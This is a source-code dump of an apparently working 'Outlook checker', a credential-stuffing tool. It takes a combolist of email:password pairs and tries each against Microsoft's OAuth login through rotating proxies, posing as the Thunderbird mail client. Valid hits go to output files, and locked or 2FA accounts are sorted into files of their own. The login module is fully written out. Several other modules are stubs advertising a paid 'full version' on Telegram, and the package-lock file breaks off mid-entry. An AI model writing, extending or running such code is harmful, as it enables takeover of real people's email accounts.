14 | 15 | 16 | let proxy_type; 17 | let inbox_filter; 18 | let thread_num; 19 | let retry_limit; 20 | 21 | try { 22 | const config = require(path.join(process.cwd(), 'config.js')); 23 | thread_num = config.threads; 24 | proxy_type = config.proxy_type.toLowerCase(); 25 | inbox_filter = config.inbox_filter; 26 | retry_limit = config.retry_limit; 27 | } catch (error) { 28 | Log.Error("Config file malformed: download the source code again from: https://github.com/etherialdev/outlook-checker") 29 | } 30 | 31 | async function worker(session, email, password) { 32 | try { 33 | const login = await login_func(session, email, password) 34 | if (login.status == "already_connected") { 35 | Log.Success(`Valid account! | ${email}:${password}`) 36 | return {status: "success", domain_list: null, access_token: null, response: null} 37 | }else if (login.status == "success") { 38 | Log.Success(`Valid account! | ${email}:${password}`) 39 | return {status: "success", domain_list: null, access_token: null, response: null} 40 | }else{ 41 | return {status: login.status, domain_list: null, access_token: null, response: null} 42 | } 43 | } catch (error) { 44 | return {status: "retry", domain_list: null, access_token: null, response: error} 45 | } 46 | } 47 | 48 | async function process_element() { 49 | return new Promise((resolve) => { 50 | setTimeout(() => { 51 | resolve(); 52 | }, 100); 53 | }); 54 | } 55 | 56 | async function start(section, proxies) { 57 | try { 58 | for (let index = 0; index < section.length; index++) { 59 | const data_line = section[index]; 60 | const parts = data_line.split(':'); 61 | const email = parts[0].trim(); 62 | const password = parts[1].trim() 63 | let retry_count = 0; 64 | 65 | process_element() 66 | while (retry_count <= retry_limit) { 67 | retry_count++; 68 | const proxy = proxies[Math.floor(Math.random() * proxies.length)]; 69 | 70 | let proxy_url; 71 | let proxyAgent; 72 | 73 | if (proxy_type.includes("socks")) { 74 | proxy_url = `${proxy_type}://${proxy}`; 75 | proxyAgent = new SocksProxyAgent(proxy_url); 76 | }else{ 77 | proxy_url = `${proxy_type}://${proxy}`; 78 | proxyAgent = new HttpsProxyAgent(proxy_url); 79 | } 80 | 81 | const cookieJar = new CookieJar(); 82 | const session = got.default.extend({ 83 | cookieJar, 84 | agent: { 85 | https: proxyAgent 86 | } 87 | }); 88 | 89 | const status = await worker(session, email, password); 90 | if (status.status == "success") { 91 | fs.appendFileSync(path.join(process.cwd(), 'output', 'valid.txt'), `${email}:${password}\n`, 'utf8'); 92 | }else if(status.status == "locked"){ 93 | Log.Debug(`Locked account | ${email}:${password}`) 94 | fs.appendFileSync(path.join(process.cwd(), 'output', 'phone_locked.txt'), `${email}:${password}\n`, 'utf8'); 95 | }else if(status.status == "2fa_detected"){ 96 | Log.Debug(`2fa detected | ${email}:${password}`) 97 | fs.appendFileSync(path.join(process.cwd(), 'output', '2fa.txt'), `${email}:${password}\n`, 'utf8'); 98 | }else if(status.status == "invalid"){ 99 | Log.Debug(`Invalid account | ${email}:${password}`) 100 | fs.appendFileSync(path.join(process.cwd(), 'output', 'invalid.txt'), `${email}:${password}\n`, 'utf8'); 101 | }else if(status.status == "passkey_interrupt"){ 102 | Log.Warning(`Passkey interrupt happened, need to retry ${email}:${password})`) 103 | }else if(status.status == "recovery"){ 104 | Log.Debug(`Locked account (Recovery) | ${email}:${password}`) 105 | fs.appendFileSync(path.join(process.cwd(), 'output', 'locked.txt'), `${email}:${password} | Recovery\n`, 'utf8'); 106 | }else if(status.status == "security_info_change"){ 107 | Log.Debug(`Locked account (security info change pending) | ${email}:${password}`) 108 | fs.appendFileSync(path.join(process.cwd(), 'output', 'locked.txt'), `${email}:${password} | Security info change pending\n`, 'utf8'); 109 | }else if(status.status == "too_many_tries"){ 110 | Log.Debug(`Too many tries (login blocked) | ${email}:${password}`) 111 | fs.appendFileSync(path.join(process.cwd(), 'output', 'locked.txt'), `${email}:${password} | Too many tries (login blocked)\n`, 'utf8'); 112 | }else{ 113 | Log.Error(`Proxy timeout error`); 114 | } 115 | if (status.status !== "retry" && status.status !== "passkey_interrupt") { 116 | break; 117 | } 118 | } 119 | if (retry_count > retry_limit) { 120 | fs.appendFileSync(path.join(process.cwd(), 'output', 'failed_check.txt'), `${email}:${password}\n`, 'utf8'); 121 | } 122 | } 123 | } catch (error) { 124 | Log.Error(`Error: ${error}`) 125 | } 126 | } 127 | 128 | async function check_config() { 129 | const is_empty = file => fs.statSync(file).size > 0; 130 | let value = 0; 131 | const lines = fs.readFileSync(path.join(process.cwd(), 'input', 'combolist.txt'), 'utf-8').split('\n').filter(line => line.trim()); 132 | lines.forEach(() => value++); 133 | 134 | const errors = []; 135 | if (fs.existsSync("./config.js")) { 136 | if (!['http', 'socks4', 'socks5'].includes(proxy_type)) { 137 | errors.push('proxy_type_error'); 138 | } 139 | if (!Number.isInteger(thread_num)) { 140 | errors.push('thread_num_error'); 141 | } 142 | if (!Number.isInteger(retry_limit)) { 143 | errors.push('retry_limit_error'); 144 | } 145 | if (inbox_filter.every(item => item === "")) { 146 | errors.push('inbox_filter_empty'); 147 | } 148 | if (!is_empty('input/proxies.txt')) { 149 | errors.push('empty_proxies_error') 150 | } 151 | if (!is_empty('input/combolist.txt')) { 152 | errors.push('empty_combolist_error') 153 | } 154 | if (thread_num > value) { 155 | errors.push('thread_num_error_2') 156 | } 157 | 158 | } else { 159 | errors.push('config_file_missing'); 160 | } 161 | if (errors.length > 0) { 162 | return errors; 163 | } 164 | } 165 | 166 | function wait(ms) { 167 | return new Promise(resolve => setTimeout(resolve, ms)); 168 | } 169 | 170 | async function main() { 171 | Log.Warning("Inbox filter is in the full version. Buy it on Telegram: t.me/etherialdev Free release at 200 stars!"); 172 | await wait(5000); 173 | if ((proxy_type != "undefined" & thread_num != "undefined") & inbox_filter != "undefined" & retry_limit != "undefined") { 174 | const error_statuses = { 175 | proxy_type_error: false, 176 | inbox_filter_empty: false, 177 | config_file_missing: false, 178 | thread_num_error: false, 179 | empty_proxies_error: false, 180 | empty_combolist_error: false, 181 | thread_num_error_2: false, 182 | retry_limit_error: false 183 | }; 184 | 185 | const errors = await check_config() 186 | if (errors) { 187 | for (const error of Object.keys(error_statuses)) { 188 | error_statuses[error] = errors.includes(error); 189 | } 190 | } 191 | if (error_statuses.config_file_missing) { 192 | Log.Error("Config file missing, download the source code again from: https://github.com/etherialdev/outlook-checker"); 193 | } 194 | if (error_statuses.retry_limit_error) { 195 | Log.Error("Wrong retry_limit value, please check the config.js file!"); 196 | } 197 | if (error_statuses.proxy_type_error) { 198 | Log.Error("Wrong proxy type, please check the config.js file! (supported proxy types: HTTP, SOCKS4, SOCKS5)"); 199 | } 200 | if (error_statuses.inbox_filter_empty) { 201 | //Log.Warning("The inbox_filter in the config.js file was empty, input the site domains if you want to save the hits!"); 202 | } 203 | if (error_statuses.thread_num_error) { 204 | Log.Error("The thread_num in the config file is not a number, please enter a number."); 205 | } 206 | if (error_statuses.empty_proxies_error) { 207 | Log.Error("The proxies.txt is empty, please input your proxies. format: username:password@hostname:port"); 208 | } 209 | if (error_statuses.empty_combolist_error) { 210 | Log.Error("The combolist.txt is empty, please input your data. format: email:password"); 211 | } 212 | if (error_statuses.thread_num_error_2) { 213 | Log.Error("The thread_num in the config file cannot be higher than the lines of the combolist.txt!") 214 | } 215 | 216 | if (!error_statuses.proxy_type_error && !error_statuses.proxy_check_error && !error_statuses.config_file_missing && !error_statuses.empty_proxies_error && !error_statuses.empty_combolist_error && !error_statuses.thread_num_error_2) { 217 | const sections = await get_sections(path.join(process.cwd(), 'input', 'combolist.txt'), thread_num); 218 | const proxy_data = fs.readFileSync(path.join(process.cwd(), 'input', 'proxies.txt'), 'utf8'); 219 | const proxies = proxy_data.split('\n'); 220 | let section_num = "1"; 221 | for (let index = 0; index < thread_num; index++) { 222 | const section = sections[`section_${section_num}`]; 223 | start(section, proxies); 224 | section_num++; 225 | } 226 | } 227 | }else{ 228 | Log.Error("There are an issue with the config file, please check it!") 229 | } 230 | } 231 | 232 | process.stdout.write('\x1b]0;Outlook Checker | t.me/etherialdev\x07'); 233 | main() 234 | setInterval(() => {}, 1000); -------------------------------------------------------------------------------- /input/combolist.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/etherialdev/outlook-checker/b234c41cd6194fbb00aa44f62d2cd5ead249b189/input/combolist.txt -------------------------------------------------------------------------------- /input/proxies.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/etherialdev/outlook-checker/b234c41cd6194fbb00aa44f62d2cd5ead249b189/input/proxies.txt -------------------------------------------------------------------------------- /modules/accesstoken.js: -------------------------------------------------------------------------------- 1 | const { header_7 } = require('../utils/headers.js'); 2 | 3 | async function get_access_token(session, code) { 4 | // Purchase the full version: https://t.me/etherialdev 5 | } 6 | 7 | async function accesstoken_func(session, code) { 8 | // Purchase the full version: https://t.me/etherialdev 9 | } 10 | 11 | module.exports = { 12 | accesstoken_func, 13 | } -------------------------------------------------------------------------------- /modules/imap.js: -------------------------------------------------------------------------------- 1 | const { ImapFlow } = require('imapflow'); 2 | 3 | async function get_imap_client(email, access_token) { 4 | // Purchase the full version: https://t.me/etherialdev 5 | } 6 | 7 | async function get_domains(imap_client) { 8 | // Purchase the full version: https://t.me/etherialdev 9 | } 10 | 11 | async function imap_func(email, access_token) { 12 | // Purchase the full version: https://t.me/etherialdev 13 | } 14 | 15 | 16 | module.exports = { 17 | imap_func, 18 | } 19 | -------------------------------------------------------------------------------- /modules/logger.js: -------------------------------------------------------------------------------- 1 | const fs = require('fs'); 2 | const { Mutex } = require('async-mutex'); 3 | const { format } = require('date-fns'); 4 | 5 | class Log { 6 | static lock = new Mutex(); 7 | static logFile = null; 8 | 9 | static setLogFile(filename) { 10 | Log.logFile = fs.createWriteStream(filename, { flags: 'a' }); 11 | } 12 | 13 | static async _log(level, prefix, message) { 14 | const timestamp = format(new Date(), 'HH:mm:ss'); 15 | const logMessage = `[\x1b[34m${timestamp}\x1b[0m] ${prefix} ${message}`; 16 | 17 | await Log.lock.runExclusive(async () => { 18 | if (Log.logFile) { 19 | Log.logFile.write(logMessage + '\n'); 20 | Log.logFile.flush(); 21 | } 22 | console.log(logMessage); 23 | }); 24 | } 25 | 26 | static async Success(message, prefix = "(+)", color = "\x1b[32m") { 27 | await Log._log("SUCCESS", `${color}${prefix}\x1b[0m`, message); 28 | } 29 | 30 | static async Error(message, prefix = "(-)", color = "\x1b[31m") { 31 | await Log._log("ERROR", `${color}${prefix}\x1b[0m`, message); 32 | } 33 | 34 | static async Debug(message, prefix = "(#)", color = "\x1b[33m") { 35 | await Log._log("DEBUG", `${color}${prefix}\x1b[0m`, message); 36 | } 37 | 38 | static async Info(message, prefix = "(?)", color = "\x1b[37m") { 39 | await Log._log("INFO", `${color}${prefix}\x1b[0m`, message); 40 | } 41 | 42 | static async Warning(message, prefix = "(!)", color = "\x1b[35m") { 43 | await Log._log("WARNING", `${color}${prefix}\x1b[0m`, message); 44 | } 45 | 46 | static async info(message, prefix = "(?)", color = "\x1b[37m") { 47 | await Log._log("INFO", `${color}${prefix}\x1b[0m`, message); 48 | } 49 | 50 | static async error(message, prefix = "(-)", color = "\x1b[31m") { 51 | await Log._log("ERROR", `${color}${prefix}\x1b[0m`, message); 52 | } 53 | 54 | static async warning(message, prefix = "(!)", color = "\x1b[35m") { 55 | await Log._log("WARNING", `${color}${prefix}\x1b[0m`, message); 56 | } 57 | } 58 | 59 | 60 | 61 | 62 | module.exports = { Log }; -------------------------------------------------------------------------------- /modules/login.js: -------------------------------------------------------------------------------- 1 | const { header_1, header_2, header_3 } = require('../utils/headers.js'); 2 | 3 | async function get_login_url(session, email) { 4 | try { 5 | const response = await session.get( 6 | 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize', { 7 | headers: header_1(), 8 | searchParams: { 9 | "redirect_uri": "msauth://net.thunderbird.android/S9nqeF27sTJcEfaInpC%2BDHzHuCY%3D", 10 | "client_id": "e6f8716e-299d-4ed9-bbf3-453f192f44e5", 11 | "response_type": "code", 12 | "login_hint": email, 13 | "state": "v4WtWWgYCOSHR7rZivYT2A", 14 | "nonce": "MIgPdBlxPYQSDCh9SK1ocg", 15 | "scope": "https://outlook.office.com/IMAP.AccessAsUser.All https://outlook.office.com/SMTP.Send offline_access", 16 | "code_challenge": "ybj7gD4AewA9XLNLnunRS0LlY3wIf_iJuP8YfJE2LNA", 17 | "code_challenge_method": "S256" 18 | } 19 | }) 20 | 21 | if (String(response.url).includes("oauth20_authorize.srf")) { 22 | return { 23 | status: "success", 24 | response: response.body, 25 | redirect_url: response.url, 26 | }; 27 | }else{ 28 | return { 29 | status: "failed", 30 | response: response.body, 31 | redirect_url: null, 32 | }; 33 | } 34 | } catch (error) { 35 | return { 36 | status: "failed", 37 | response: error, 38 | redirect_url: null, 39 | }; 40 | } 41 | } 42 | 43 | async function get_login_params(session, login_params_url) { 44 | try { 45 | const response = await session.get( 46 | login_params_url, { 47 | headers: header_2() 48 | }) 49 | 50 | if (String(response.body).includes("urlPost")) { 51 | const PPFT_value = response.body.match(/name="PPFT"[^>]*value="([^"]+)"/)?.[1]; 52 | const url_post_value = response.body.match(/urlPost:'([^']+)'/)?.[1]; 53 | 54 | return { 55 | status: "success", 56 | response: response.body, 57 | redirect_url: url_post_value, 58 | PPFT: PPFT_value 59 | }; 60 | }else{ 61 | return { 62 | status: "failed", 63 | response: response.body, 64 | redirect_url: null, 65 | PPFT: null 66 | }; 67 | } 68 | } catch (error) { 69 | return { 70 | status: "failed", 71 | response: error, 72 | PPFT: null 73 | }; 74 | } 75 | } 76 | 77 | 78 | async function login(session, email, password, ppft, login_params_url, login_url) { 79 | try { 80 | const payload = { 81 | "ps": "2", 82 | "psRNGCDefaultType": "", 83 | "psRNGCEntropy": "", 84 | "psRNGCSLK": "", 85 | "canary": "", 86 | "ctx": "", 87 | "hpgrequestid": "", 88 | "PPFT": ppft, 89 | "PPSX": "Pass", 90 | "NewUser": "1", 91 | "FoundMSAs": "", 92 | "fspost": "0", 93 | "i21": "0", 94 | "CookieDisclosure": "0", 95 | "IsFidoSupported": "1", 96 | "isSignupPost": "0", 97 | "isRecoveryAttemptPost": "0", 98 | "i13": "1", 99 | "login": email, 100 | "loginfmt": email, 101 | "type": "11", 102 | "LoginOptions": "1", 103 | "lrt": "", 104 | "lrtPartition": "", 105 | "hisRegion": "", 106 | "hisScaleUnit": "", 107 | "passwd": password 108 | } 109 | const response = await session.post( 110 | login_url, 111 | { 112 | form: payload, 113 | headers: header_3(login_params_url), 114 | } 115 | ) 116 | 117 | if (String(response.body).includes("account.live.com/Abuse")) { 118 | return { 119 | status: "locked", 120 | response: response.body, 121 | consent_link: null, 122 | pprid: null, 123 | ipt: null, 124 | uaid: null, 125 | client_id: null, 126 | scope: null, 127 | code: null 128 | }; 129 | }else if (String(response.body).includes("Your account or password is incorrect.")) { 130 | return { 131 | status: "invalid", 132 | response: response.body, 133 | consent_link: null, 134 | pprid: null, 135 | ipt: null, 136 | uaid: null, 137 | client_id: null, 138 | scope: null, 139 | code: null 140 | }; 141 | }else if(String(response.body).includes("live.com/recover")){ 142 | return { 143 | status: "recovery", 144 | response: response.body, 145 | consent_link: null, 146 | pprid: null, 147 | ipt: null, 148 | uaid: null, 149 | client_id: null, 150 | scope: null, 151 | code: null 152 | }; 153 | }else if(String(response.body).includes("ar/cancel")){ 154 | return { 155 | status: "security_info_change", 156 | response: response.body, 157 | consent_link: null, 158 | pprid: null, 159 | ipt: null, 160 | uaid: null, 161 | client_id: null, 162 | scope: null, 163 | code: null 164 | }; 165 | }else if(String(response.body).includes("live.com/ResetPassword")){ 166 | return { 167 | status: "too_many_tries", 168 | response: response.body, 169 | consent_link: null, 170 | pprid: null, 171 | ipt: null, 172 | uaid: null, 173 | client_id: null, 174 | scope: null, 175 | code: null 176 | }; 177 | }else if(String(response.body).includes('interrupt/passkey')){ 178 | return { 179 | status: "passkey_interrupt", 180 | response: response.body, 181 | consent_link: null, 182 | pprid: null, 183 | ipt: null, 184 | uaid: null, 185 | client_id: null, 186 | scope: null, 187 | code: null 188 | }; 189 | }else if(String(response.body).includes('agreements/privacy')){ 190 | return { 191 | status: "2fa_detected", 192 | response: response.body, 193 | consent_link: null, 194 | pprid: null, 195 | ipt: null, 196 | uaid: null, 197 | client_id: null, 198 | scope: null, 199 | code: null 200 | }; 201 | }else if(String(response.body).includes('id="client_id" value="')){ 202 | 203 | const consent_link_value = response.body.match(/id="fmHF"[^>]*action="([^"]+)"/)?.[1]; 204 | const pprid_value = response.body.match(/id="pprid"[^>]*value="([^"]+)"/)?.[1]; 205 | const ipt_value = response.body.match(/id="ipt"[^>]*value="([^"]*)"/)?.[1]; 206 | const uaid_value = response.body.match(/id="uaid"[^>]*value="([^"]+)"/)?.[1]; 207 | const client_id_value = response.body.match(/id="client_id"[^>]*value="([^"]*)"/)?.[1]; 208 | const scope_value = response.body.match(/id="scope"[^>]*value="([^"]*)"/)?.[1]; 209 | 210 | return { 211 | status: "success", 212 | response: response.body, 213 | consent_link: consent_link_value, 214 | pprid: pprid_value, 215 | ipt: ipt_value, 216 | uaid: uaid_value, 217 | client_id: client_id_value, 218 | scope: scope_value, 219 | code: null 220 | }; 221 | }else { 222 | return { 223 | status: "failed", 224 | response: response.body, 225 | consent_link: null, 226 | pprid: null, 227 | ipt: null, 228 | uaid: null, 229 | client_id: null, 230 | scope: null, 231 | code: null 232 | }; 233 | } 234 | } catch (error) { 235 | if (String(error.response.headers.location).includes("M.")) { 236 | return { 237 | status: "already_connected", 238 | response: error, 239 | consent_link: null, 240 | pprid: null, 241 | ipt: null, 242 | uaid: null, 243 | client_id: null, 244 | scope: null, 245 | code: String(error.response.headers.location).split("?code=")[1].split("&")[0] 246 | }; 247 | }else{ 248 | return { 249 | status: "failed", 250 | response: error, 251 | consent_link: null, 252 | pprid: null, 253 | ipt: null, 254 | uaid: null, 255 | client_id: null, 256 | scope: null, 257 | code: null 258 | }; 259 | } 260 | } 261 | } 262 | 263 | async function login_func(session, email, email_password) { 264 | const login_params_url = await get_login_url(session, email) 265 | if (login_params_url.status == "success") { 266 | const login_params = await get_login_params(session, login_params_url.redirect_url) 267 | if (login_params.status == "success") { 268 | const try_login = await login(session, email, email_password, login_params.PPFT, login_params_url.redirect_url, login_params.redirect_url) 269 | 270 | if (try_login.status == "already_connected") { 271 | return {status: "already_connected", function: "login", login_properties: try_login} 272 | }else if (try_login.status == "2fa_detected") { 273 | return {status: "2fa_detected", function: "login", login_properties: try_login} 274 | }else if (try_login.status == "success") { 275 | return {status: "success", function: "login", login_properties: try_login} 276 | }else if(try_login.status == "locked"){ 277 | return {status: "locked", function: "login", login_properties: try_login} 278 | }else if(try_login.status == "invalid"){ 279 | return {status: "invalid", function: "login", login_properties: try_login} 280 | }else if(try_login.status == "passkey_interrupt"){ 281 | return {status: "passkey_interrupt", function: "login", login_properties: try_login} 282 | }else if(try_login.status == "recovery"){ 283 | return {status: "recovery", function: "login", login_properties: try_login} 284 | }else if(try_login.status == "too_many_tries"){ 285 | return {status: "too_many_tries", function: "login", login_properties: try_login} 286 | }else if(try_login.status == "security_info_change"){ 287 | return {status: "security_info_change", function: "login", login_properties: try_login} 288 | }else{ 289 | return {status: "retry", function: "login", login_properties: try_login} 290 | } 291 | 292 | }else{ 293 | return {status: "retry", function: "get_login_params", login_properties: null} 294 | } 295 | }else{ 296 | return {status: "retry", function: "login_params_url", login_properties: null} 297 | } 298 | } 299 | 300 | 301 | module.exports = { 302 | login_func, 303 | } -------------------------------------------------------------------------------- /modules/thunderbird.js: -------------------------------------------------------------------------------- 1 | const { URL } = require('url'); 2 | const { header_4, header_5 } = require('../utils/headers.js'); 3 | 4 | async function get_oauth_canary(session, consent_link, pprid, ipt, uaid, client_id, scope) { 5 | // Purchase the full version: https://t.me/etherialdev 6 | } 7 | 8 | async function add_thunderbird_oauth(session, consent_link, canary, client_id, scope) { 9 | // Purchase the full version: https://t.me/etherialdev 10 | } 11 | 12 | 13 | 14 | 15 | async function thunderbird_func(session, email, login_properties) { 16 | // Purchase the full version: https://t.me/etherialdev 17 | } 18 | 19 | 20 | module.exports = { 21 | thunderbird_func, 22 | } -------------------------------------------------------------------------------- /output/valid.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/etherialdev/outlook-checker/b234c41cd6194fbb00aa44f62d2cd5ead249b189/output/valid.txt -------------------------------------------------------------------------------- /package-lock.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "outlook-checker", 3 | "version": "2.0.0", 4 | "lockfileVersion": 3, 5 | "requires": true, 6 | "packages": { 7 | "": { 8 | "name": "outlook-checker", 9 | "version": "2.0.0", 10 | "license": "GPL-3.0-or-later", 11 | "dependencies": { 12 | "async-mutex": "^0.5.0", 13 | "date-fns": "^4.1.0", 14 | "got": "^11.8.6", 15 | "https-proxy-agent": "^7.0.6", 16 | "imap": "^0.8.19", 17 | "imapflow": "^1.0.177", 18 | "request": "^2.88.2", 19 | "socks-proxy-agent": "^8.0.5", 20 | "tough-cookie": "^5.1.0", 21 | "tunnel": "^0.0.6" 22 | }, 23 | "bin": { 24 | "outlook-checker": "index.js" 25 | }, 26 | "devDependencies": { 27 | "esbuild": "^0.24.2" 28 | } 29 | }, 30 | "node_modules/@esbuild/aix-ppc64": { 31 | "version": "0.24.2", 32 | "resolved": "https://registry.npmjs.org/@esbuild/aix-ppc64/-/aix-ppc64-0.24.2.tgz", 33 | "integrity": "sha512-thpVCb/rhxE/BnMLQ7GReQLLN8q9qbHmI55F4489/ByVg2aQaQ6kbcLb6FHkocZzQhxc4gx0sCk0tJkKBFzDhA==", 34 | "cpu": [ 35 | "ppc64" 36 | ], 37 | "dev": true, 38 | "optional": true, 39 | "os": [ 40 | "aix" 41 | ], 42 | "engines": { 43 | "node": ">=18" 44 | } 45 | }, 46 | "node_modules/@esbuild/android-arm": { 47 | "version": "0.24.2", 48 | "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.24.2.tgz", 49 | "integrity": "sha512-tmwl4hJkCfNHwFB3nBa8z1Uy3ypZpxqxfTQOcHX+xRByyYgunVbZ9MzUUfb0RxaHIMnbHagwAxuTL+tnNM+1/Q==", 50 | "cpu": [ 51 | "arm" 52 | ], 53 | "dev": true, 54 | "optional": true, 55 | "os": [ 56 | "android" 57 | ], 58 | "engines": { 59 | "node": ">=18" 60 | } 61 | }, 62 | "node_modules/@esbuild/android-arm64": { 63 | "version": "0.24.2", 64 | "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.24.2.tgz", 65 | "integrity": "sha512-cNLgeqCqV8WxfcTIOeL4OAtSmL8JjcN6m09XIgro1Wi7cF4t/THaWEa7eL5CMoMBdjoHOTh/vwTO/o2TRXIyzg==", 66 | "cpu": [ 67 | "arm64" 68 | ], 69 | "dev": true, 70 | "optional": true, 71 | "os": [ 72 | "android" 73 | ], 74 | "engines": { 75 | "node": ">=18" 76 | } 77 | }, 78 | "node_modules/@esbuild/android-x64": { 79 | "version": "0.24.2", 80 | "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.24.2.tgz", 81 | "integrity": "sha512-B6Q0YQDqMx9D7rvIcsXfmJfvUYLoP722bgfBlO5cGvNVb5V/+Y7nhBE3mHV9OpxBf4eAS2S68KZztiPaWq4XYw==", 82 | "cpu": [ 83 | "x64" 84 | ], 85 | "dev": true, 86 | "optional": true, 87 | "os": [ 88 | "android" 89 | ], 90 | "engines": { 91 | "node": ">=18" 92 | } 93 | }, 94 | "node_modules/@esbuild/darwin-arm64": { 95 | "version": "0.24.2", 96 | "resolved": "https://registry.npmjs.org/@esbuild/darwin-arm64/-/darwin-arm64-0.24.2.tgz", 97 | "integrity": "sha512-kj3AnYWc+CekmZnS5IPu9D+HWtUI49hbnyqk0FLEJDbzCIQt7hg7ucF1SQAilhtYpIujfaHr6O0UHlzzSPdOeA==", 98 | "cpu": [ 99 | "arm64" 100 | ], 101 | "dev": true, 102 | "optional": true, 103 | "os": [ 104 | "darwin" 105 | ], 106 | "engines": { 107 | "node": ">=18" 108 | } 109 | }, 110 | "node_modules/@esbuild/darwin-x64": { 111 | "version": "0.24.2", 112 | "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.24.2.tgz", 113 | "integrity": "sha512-WeSrmwwHaPkNR5H3yYfowhZcbriGqooyu3zI/3GGpF8AyUdsrrP0X6KumITGA9WOyiJavnGZUwPGvxvwfWPHIA==", 114 | "cpu": [ 115 | "x64" 116 | ], 117 | "dev": true, 118 | "optional": true, 119 | "os": [ 120 | "darwin" 121 | ], 122 | "engines": { 123 | "node": ">=18" 124 | } 125 | }, 126 | "node_modules/@esbuild/freebsd-arm64": { 127 | "version": "0.24.2", 128 | "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.24.2.tgz", 129 | "integrity": "sha512-UN8HXjtJ0k/Mj6a9+5u6+2eZ2ERD7Edt1Q9IZiB5UZAIdPnVKDoG7mdTVGhHJIeEml60JteamR3qhsr1r8gXvg==", 130 | "cpu": [ 131 | "arm64" 132 | ], 133 | "dev": true, 134 | "optional": true, 135 | "os": [ 136 | "freebsd" 137 | ], 138 | "engines": { 139 | "node": ">=18" 140 | } 141 | }, 142 | "node_modules/@esbuild/freebsd-x64": { 143 | "version": "0.24.2", 144 | "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.24.2.tgz", 145 | "integrity": "sha512-TvW7wE/89PYW+IevEJXZ5sF6gJRDY/14hyIGFXdIucxCsbRmLUcjseQu1SyTko+2idmCw94TgyaEZi9HUSOe3Q==", 146 | "cpu": [ 147 | "x64" 148 | ], 149 | "dev": true, 150 | "optional": true, 151 | "os": [ 152 | "freebsd" 153 | ], 154 | "engines": { 155 | "node": ">=18" 156 | } 157 | }, 158 | "node_modules/@esbuild/linux-arm": { 159 | "version": "0.24.2", 160 | "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.24.2.tgz", 161 | "integrity": "sha512-n0WRM/gWIdU29J57hJyUdIsk0WarGd6To0s+Y+LwvlC55wt+GT/OgkwoXCXvIue1i1sSNWblHEig00GBWiJgfA==", 162 | "cpu": [ 163 | "arm" 164 | ], 165 | "dev": true, 166 | "optional": true, 167 | "os": [ 168 | "linux" 169 | ], 170 | "engines": { 171 | "node": ">=18" 172 | } 173 | }, 174 | "node_modules/@esbuild/linux-arm64": { 175 | "version": "0.24.2", 176 | "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.24.2.tgz", 177 | "integrity": "sha512-7HnAD6074BW43YvvUmE/35Id9/NB7BeX5EoNkK9obndmZBUk8xmJJeU7DwmUeN7tkysslb2eSl6CTrYz6oEMQg==", 178 | "cpu": [ 179 | "arm64" 180 | ], 181 | "dev": true, 182 | "optional": true, 183 | "os": [ 184 | "linux" 185 | ], 186 | "engines": { 187 | "node": ">=18" 188 | } 189 | }, 190 | "node_modules/@esbuild/linux-ia32": { 191 | "version": "0.24.2", 192 | "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.24.2.tgz", 193 | "integrity": "sha512-sfv0tGPQhcZOgTKO3oBE9xpHuUqguHvSo4jl+wjnKwFpapx+vUDcawbwPNuBIAYdRAvIDBfZVvXprIj3HA+Ugw==", 194 | "cpu": [ 195 | "ia32" 196 | ], 197 | "dev": true, 198 | "optional": true, 199 | "os": [ 200 | "linux" 201 | ], 202 | "engines": { 203 | "node": ">=18" 204 | } 205 | }, 206 | "node_modules/@esbuild/linux-loong64": { 207 | "version": "0.24.2", 208 | "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.24.2.tgz", 209 | "integrity": "sha512-CN9AZr8kEndGooS35ntToZLTQLHEjtVB5n7dl8ZcTZMonJ7CCfStrYhrzF97eAecqVbVJ7APOEe18RPI4KLhwQ==", 210 | "cpu": [ 211 | "loong64" 212 | ], 213 | "dev": true, 214 | "optional": true, 215 | "os": [ 216 | "linux" 217 | ], 218 | "engines": { 219 | "node": ">=18" 220 | } 221 | }, 222 | "node_modules/@esbuild/linux-mips64el": { 223 | "version": "0.24.2", 224 | "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.24.2.tgz", 225 | "integrity": "sha512-iMkk7qr/wl3exJATwkISxI7kTcmHKE+BlymIAbHO8xanq/TjHaaVThFF6ipWzPHryoFsesNQJPE/3wFJw4+huw==", 226 | "cpu": [ 227 | "mips64el" 228 | ], 229 | "dev": true, 230 | "optional": true, 231 | "os": [ 232 | "linux" 233 | ], 234 | "engines": { 235 | "node": ">=18" 236 | } 237 | }, 238 | "node_modules/@esbuild/linux-ppc64": { 239 | "version": "0.24.2", 240 | "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.24.2.tgz", 241 | "integrity": "sha512-shsVrgCZ57Vr2L8mm39kO5PPIb+843FStGt7sGGoqiiWYconSxwTiuswC1VJZLCjNiMLAMh34jg4VSEQb+iEbw==", 242 | "cpu": [ 243 | "ppc64" 244 | ], 245 | "dev": true, 246 | "optional": true, 247 | "os": [ 248 | "linux" 249 | ], 250 | "engines": { 251 | "node": ">=18" 252 | } 253 | }, 254 | "node_modules/@esbuild/linux-riscv64": { 255 | "version": "0.24.2", 256 | "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.24.2.tgz", 257 | "integrity": "sha512-4eSFWnU9Hhd68fW16GD0TINewo1L6dRrB+oLNNbYyMUAeOD2yCK5KXGK1GH4qD/kT+bTEXjsyTCiJGHPZ3eM9Q==", 258 | "cpu": [ 259 | "riscv64" 260 | ], 261 | "dev": true, 262 | "optional": true, 263 | "os": [ 264 | "linux" 265 | ], 266 | "engines": { 267 | "node": ">=18" 268 | } 269 | }, 270 | "node_modules/@esbuild/linux-s390x": { 271 | "version": "0.24.2", 272 | 